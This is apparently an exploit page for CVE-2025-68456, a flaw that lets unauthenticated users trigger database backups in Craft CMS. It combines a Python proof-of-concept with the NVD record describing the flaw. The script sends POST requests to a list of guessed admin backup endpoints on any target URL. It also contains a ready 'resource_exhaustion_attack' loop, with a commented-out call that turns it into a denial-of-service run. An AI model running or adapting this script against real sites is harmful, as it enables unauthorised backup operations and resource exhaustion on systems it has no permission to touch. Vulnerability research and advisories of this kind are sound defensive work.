CVE-2025-68456

#!/usr/bin/env python3 """ CVE-2025-68456 PoC - Craft CMS Unauthenticated Database Backup Trigger This PoC demonstrates how an unauthenticated attacker can trigger database backup operations """ import requests import sys import time def trigger_backup(target_url): """ Trigger database backup without authentication """ # Try common admin action endpoints endpoints = [ '/actions/craft-app/backups/create', '/actions/craft-app/database/backups/create', '/api/backups', '/admin/actions/craft-app/backups/create' ] headers = { 'User-Agent': 'Craft CMS Backup Trigger PoC', 'Content-Type': 'application/json', 'X-Craft-Action': 'backup' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.post(url, headers=headers, timeout=30) if response.status_code in [200, 302, 403]: print(f"[*] Endpoint {endpoint} responded with status {response.status_code}") if response.status_code == 200: print(f"[!] Potential backup trigger at {url}") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def resource_exhaustion_attack(target_url, iterations=10): """ Perform resource exhaustion by repeatedly triggering backups """ print(f"[*] Starting resource exhaustion attack ({iterations} iterations)...") for i in range(iterations): print(f"[*] Iteration {i+1}/{iterations}") trigger_backup(target_url) time.sleep(2) # Wait between requests print("[*] Attack completed") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68456.py <target_url>") print("Example: python cve-2025-68456.py https://vulnerable-site.com") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] CVE-2025-68456: Craft CMS Unauthenticated Database Backup Trigger") # Check if backup can be triggered if trigger_backup(target): print("[!] Vulnerability confirmed - backup can be triggered") # Uncomment to perform DoS attack # resource_exhaustion_attack(target, iterations=50) else: print("[-] Could not confirm vulnerability")

{"cve": {"id": "CVE-2025-68456", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:52.727", "lastModified": "2026-01-12T18:19:38.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-202"}, {"lang": "en", "value": "CWE-770"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "4.16.17", "matchCriteriaId": "269DCC5B-520D-4FA8-9D7B-3984EE16D5C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1", "versionEndExcluding": "5.8.21", "matchCriteriaId": "DD1EB061-284A-4708-BC67-DE02EF7A5E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}